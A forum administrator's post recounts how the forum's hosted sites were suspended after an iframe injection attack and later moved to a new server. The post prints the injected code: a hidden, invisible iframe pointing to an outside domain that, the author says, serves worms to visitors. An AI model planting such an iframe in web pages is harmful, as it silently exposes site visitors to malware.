I wish to share my nightmare experience with you now.
My sites (including my personal web site) are hosted in
http://www.hostmonster.com (Yes, the famous so called unlimited web space, unlimited bandwidth, unlimited add-on domains... giving web hosting server).
HMGForum was also one of the sites hosted there. Yesterday at about 11 p.m. I'd found out that, my sites were suspended to safeguard against malware. I had immediately contacted their support and they asked me to clean the malware affected files. Our site was affected by iframe injection attack on index.html/php files. More details of this malware can be seen from
here.
Now, it is so ridiculous how this malware is injected in the site. It is because of a security hole in Adobe PDF Reader (below version 9.1). When you open an affected PDF (Yes! PDF files may also contain JavaScript malwares!) using Adobe Reader, using some javascript, it finds out all the ftp accounts and passwords and sends to a common server! That common culprit server periodically logs into these ftp accounts, downloads index.html and index.php files, injects a code like the one below:
<iframe src="
http://internetcountercheck.com/?click=7158656" width=1
height=1 style="visibility:hidden;position:absolute"></iframe>
Once this is injected in the main index file, whenever somebody visits the site, they will be downloading some worms. So, it goes on like this. That's why I am using Sumatra PDF reader for opening PDF files. Now, we should never save ftp account username/password anywhere in computer, except our mind.
Coming to our tragedy, I worked about 3 hours and it was 3 a.m. in the morning, I checked each and every html/php file for this malicious code and found them in 3 files only. I had removed them and uploaded the clean copy. In spite of doing all this, the web hosting company didn't activate the account.
They have asked me to ensure that there is no security holes by again thoroughly checking the php and html codes. I said them, I know only HMG and not php and html...
All the software I use are PHPBB, Joomla and Moodle. All of them are open source and are even distributed by these web hosting companies. Now, how can I check 1000s of files for some security holes?! Even the software are regularly updated as and when new versions are released. I am really dissatisfied with the service provided by them. So, our site was down for a long 13 hours.
So, I have decided to go for a dedicated service for our forum. Now, I have transferred all the contents to a new server fully managed by one of my friends. Here, we got an exclusive account for hmgforum and not mingled with any other site. Here we have 20 GB of hard disk (Now we have 300 MB with all database, software, uploaded files put together). I think that this would be enough for us for the near future.
As of now, all the files uploaded by the members are recovered and uploaded to the new server. HMG Download site is also recovered. However, only the latest version can be downloaded. Other versions I have to download from the old server and upload to the new server.
If you have any problem with this new server, please contact me immediately. Thanks for your patience.
